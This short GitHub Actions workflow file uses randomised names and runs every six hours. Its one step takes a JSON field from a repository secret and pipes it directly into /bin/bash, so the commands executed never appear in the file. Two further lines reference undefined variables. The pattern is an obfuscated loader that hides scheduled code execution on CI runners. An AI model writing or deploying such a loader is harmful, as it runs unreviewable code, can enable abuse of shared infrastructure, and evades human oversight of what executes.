name: fudouding1938

on:
  workflow_dispatch:
  schedule:
    - cron: '21 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fudouding1938
        env:
          mvi2735: ${{ secrets.mvi2735 }}
        run: |
          echo $mvi2735 | jq -r .zf24 | /bin/bash
          echo $jekc628 | jq -r .sqbec76136 | /bin/bash
          echo $q191 | jq -r .nfs09 | /bin/bash

